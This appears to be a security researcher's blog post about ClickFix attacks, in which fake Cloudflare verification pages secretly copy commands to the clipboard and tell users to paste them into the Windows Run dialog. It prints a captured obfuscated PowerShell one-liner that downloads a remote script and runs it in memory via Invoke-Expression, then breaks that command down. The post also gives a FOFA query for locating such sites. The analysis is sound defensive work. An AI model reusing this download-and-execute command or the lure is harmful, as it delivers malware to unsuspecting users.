ClickFix Attacks

Although ClickFix attacks have been around since early 2024, it was only in late 2024 and early 2025 that the technique became popular, making it the 2nd most common attack vector after phishing.  I'd heard of the technique but didn't really pay much attention to it until I was doing some Breach and Attack simulation work and one of the scenarios I was trying to emulate from a Threat Intel report mentioned it a the initial access vector.

In theory, its a pretty simple but novel social engineering tactic involving deceptive prompts and copying and pasting clipboard commands that are executed via the Windows Run dialog.  In terms of setup, its pretty low cost and easily setup by threat actors looking for a quick win in order to compromise an end users machine.

The most common technique used by threat actors is to mimic the Cloudflare verification service.  Cloudflare is well known, so by impersonating a trusted brand the attackers are hoping that the on-screen message provides an air of legitimacy. Most users will have come across Cloudflare's verification screen on a legitimate website at some point as it is often used on websites where the web application owner is looking to protect itself from automated bots.  Its this factor that the attackers prey on, using a fake prompt instructing the user to complete a series of actions as a second line of  verification which may not raise immediate suspicion.

The following screenshot is of a website using the aforementioned technique, everything looks unsuspecting until you actually click within the verification square where its says "I'm not a robot".

Once you click into this box, your presented with a 2nd prompt:  

What actually occurs is that when the user clicks in the fake I'm not a robot checkbox, a hidden JavaScript function is triggered which copies some PowerShell or Command Prompt script into the clipboard without the users knowledge.  

If you were to follow the instructions on screen, the Windows Key +R combination will open the Windows run dialogue, then Ctrl + V will copy whatever is in the clipboard into the Windows run dialogue and then subsequently run whatever hidden command that has been loaded onto the users clipboard.

As shown below, the hidden code copied onto the clipboard is a obfuscated PowerShell command, a common tactic used to hide malicious intent. This example however isn't heavily obfuscated, so its easy enough to decipher.

powershell.exe -w h -nop -c "$kh='hxxp'+'s';"$b=':'+'//'+'alababababa'+'.'+'cloud'+'/';"$c='cVG'+'vQi'+'o6'+'.txt';"$om=$kh+$b+$c;$i='{0}{1}{2}' -f 'Net.','Web','Client';"$rf=New-Object ($i);$kj=$rf.('Download'+'String')($om);Invoke-Expression $kj"```

Breaking it down:

Essentially  it uses PowerShell variables to attempt to hide the commands required to assemble a command which will go to a URL, download a script and then attempt to run said script without it actually being written to disk.  I've added a table below for clarification:

The domain featured in this example doesn't exist so no text file is ever retrieved,  my theory is that someone may have just been doing a proof of concept to see if they could actually get the webpage loading their malicious payload into the clipboard prior to  actually attempting their real ClickFix campaign.

Further Research

At time of writing there was over  554 results of potential ClickFix sites operating. This information was gathered from fofa.info.  FOFA is a search engine for global cyberspace mapping belonging to Beijing Huashun Xin'an Technology Co., Ltd, it looks and feels very similar to Shodan.

The direct link to examine the results of the query string body="In the verification window, press <b>Ctrl</b>" is:
https://en.fofa.info/result?qbase64=Ym9keT0iSW4gdGhlIHZlcmlmaWNhdGlvbiB3aW5kb3csIHByZXNzIDxiPkN0cmw8L2I%2BIiA%3D